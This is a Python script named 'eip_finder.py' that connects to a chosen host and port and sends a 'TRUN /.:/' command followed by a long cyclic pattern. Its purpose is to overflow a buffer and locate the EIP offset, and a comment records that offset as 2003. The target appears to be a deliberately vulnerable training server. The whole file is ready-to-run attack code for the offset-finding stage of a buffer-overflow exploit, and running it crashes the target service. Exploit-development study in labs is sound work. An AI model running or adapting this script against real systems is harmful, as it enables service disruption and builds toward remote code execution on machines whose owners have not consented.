#!/usr/bin/python
import optparse, sys, socket

parser = optparse.OptionParser('Example: python eip_finder.py -t <target host> -p <target port>')
parser.add_option('-t', dest='target', type='string', help='Enter a target host')
parser.add_option('-p', dest='port', type='int', help='Enter a target port')
(options, args) = parser.parse_args()
target = options.target
port = options.port

if (target == None) | (port == None):
	print(parser.usage)
	exit(0)

print('\n----------------------------------EIP_FINDER------------------------------------')
print('                               EIP Offset Locator')
print('                              Author: @rootshooter')
print('                                  Version: 1.0')
print('--------------------------------------------------------------------------------')
print('[+] Let the SEARCH begin')


command = "TRUN /.:/"
#Generated by https://github.com/Svenito/exploit-pattern
#python pattern_create.py 3000
#python pattern_create.py 0x0x386F4337
#Pattern 0x386F4337 first occurrence at position 2003 in pattern.
payload = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7"
"Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5"
"Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3"
"Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1"
"Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7"
"Ae8Ae9Af0Af1Af2Af3Af4Af5"
"Af6Af7Af8Af9Ag0Ag1Ag2Ag3"
"Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1"
"Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7"
"Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5"
"Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3"
"Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1"
"Al2Al3Al4Al5Al6Al7Al8Al9"
"Am0Am1Am2Am3Am4Am5Am6Am7"
"Am8Am9An0An1An2An3An4An5"
"An6An7An8An9Ao0Ao1Ao2Ao3"
"Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1"
"Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9"
"Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7"
"Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5"
"Ar6Ar7Ar8Ar9As0As1As2As3"
"As4As5As6As7As8As9At0At1"
"At2At3At4At5At6At7At8At9"
"Au0Au1Au2Au3Au4Au5Au6Au7"
"Au8Au9Av0Av1Av2Av3Av4Av5"
"Av6Av7Av8Av9Aw0Aw1Aw2Aw3"
"Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1"
"Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"
"Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7"
"Ay8Ay9Az0Az1Az2Az3Az4Az5"
"Az6Az7Az8Az9Ba0Ba1Ba2Ba3B"
"a4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb"
"2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0"
"Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8B"
"c9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd"
"7Bd8Bd9Be0Be1Be2Be3Be4Be5"
"Be6Be7Be8Be9Bf0Bf1Bf2Bf3B"
"f4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg"
"2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0"
"Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8B"
"h9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi"
"7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5"
"Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3B"
"k4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl"
"2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0"
"Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8B"
"m9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn"
"7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5"
"Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3B"
"p4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq"
"2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0"
"Br1Br2Br3Br4Br5Br6Br7Br8B"
"r9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs"
"7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5"
"Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3B"
"u4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv"
"2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0B"
"w1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9"
"Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx"
"8Bx9By0By1By2By3By4By5By6B"
"y7By8By9Bz0Bz1Bz2Bz3Bz4Bz5"
"Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca"
"4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C"
"b3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1"
"Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd"
"0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8C"
"d9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7"
"Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf"
"6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4C"
"g5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3"
"Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci"
"2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0C"
"j1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9"
"Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck"
"8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl"
"7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm"
"6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn"
"5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co"
"4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp"
"3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq"
"2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr"
"1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs"
"0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs"
"9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct"
"8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu"
"7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv"
"6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw"
"5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx"
"4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy"
"3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz"
"2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da"
"1Da2Da3Da4Da5Da6Da7Da8Da9Db"
"0Db1Db2Db3Db4Db5Db6Db7Db8Db"
"9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc"
"8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd"
"7Dd8Dd9De0De1De2De3De4De5De"
"6De7De8De9Df0Df1Df2Df3Df4Df"
"5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg"
"4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh"
"3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di"
"2Di3Di4Di5Di6Di7Di8Di9Dj0Dj"
"1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk"
"0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk"
"9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl"
"8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm"
"7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn"
"6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do"
"5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp"
"4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq"
"3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr"
"2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds"
"1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt"
"0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt"
"9Du0Du1Du2Du3Du4Du5Du6Du7Du"
"8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv"
"7Dv8Dv9")


try:
	print('[+] Sending Payload')
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target , port))
	s.send((command + payload))
	s.close()
	print('[+] Payload Sent')
	print('[+] Check debugger')
except:
	print('[-] ERROR: Check the debugger')
	sys.exit()